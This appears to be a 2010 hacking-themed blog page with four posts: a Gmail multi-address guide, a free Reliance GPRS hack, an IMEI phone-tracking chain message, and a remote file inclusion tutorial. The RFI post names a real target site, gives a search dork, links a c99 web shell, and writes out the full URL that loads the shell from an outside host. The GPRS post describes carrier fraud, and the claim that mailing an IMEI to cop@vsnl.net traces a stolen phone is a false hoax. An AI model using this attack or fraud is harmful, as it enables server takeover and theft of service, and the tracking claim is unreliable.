Saturday, September 4, 2010

Use Gmail Account to Send Emails from Multiple Addresses


In this post I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or to send emails, I have a solution here.
Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send emails from different addresses and receive emails for different addresses. Let’s take a simple example
Suppose you have three email addressess (email accounts)
1. gohacking@gmail.com
2. gohacking@yahoo.com
3. hacker@hotmail.com
You can integrate the emails gohacking@yahoo.com and hacker@hotmail.com to gohacking@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this.
1. Login to your gmail account.
2. Click on Settings at the top right corner.
3. Under Settings, click on Accounts tab.
4. Now you’ll see the first option “Send mail as:
5. Under this option, click on Add another email address you own
6. Now a small new window will pop-up asking you to enter the details of your new email address.
7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.
Now when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.
Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you don’t have this advantage in Yahoo or other email providers.
Please share your opinions through comments. I hope this helps….

Latest Free Reliance GPRS Hack [2010]


Hello friends,
After a long period I have come back with very interesting article. Today I will show you how you can surf free GPRS on Reliance enabled mobile phones. This hack was very popular 2-3 years back but it had stopped working. But few days back when I tried to use this hack, to my amazement, I found that this hack was working with a few modifications.

Follow the steps given below:
1.    Activate Reliance GPRS.
2.    Download modded UCWeb version 6.7 (Please note that this hack will work only on modded UCWeb version 6.7).
3.    Apply following settings in your Mobile phone GPRS Settings.
o    Name : RelianceMBWorld
o    Proxy Address : 10.239.221.5
o    Port Address : 8080
o    APN : RCOMWAP
o    Homepage : wap.google.com
o    dUsername : blank
o    Password : blank
o    Data Bearer : Packet Data
4.    Now Start your modded UCWeb 6.7. Since you will starting it for the first time it will ask you following setting:
o    Front Query : blank
o    Middle Query : blank
o    Back Query : ?id=jCustomerWAPProv/
o    Uncheck the Checkbox named Remove Port from URL
o    Host : HandlerHost
o    Press OK.
5.    Done!! Enjoy Free GPRS Surfing

Track your lost mobile

Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.
This is how it works!!!!!!
1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit .
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and Internet.
7. You will find where your hand set is being operated even in case your no is being changed.
PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

Hack a Website Using Remote File Inclusion


Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

 
 
Searching the Vulnerability
Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one
www.Targetsite.com/index.php?page=Anything
To find the vulnerability the hacker will most commonly  use the following Google Dork
“inurl:index.php?page=”
This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com
Lets say that the target website is http://www.cbspk.com
So the hacker url will become
http://www.cbspk.com/v2/index.php?page=http://www.google.com
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.
Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829
The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is
http://h1.ripway.com/rafaybaloch/c99.txt
Now here is how a hacker would execute the following command to gain access
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?
Don't forget to say thanks...


 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Web Hosting Bluehost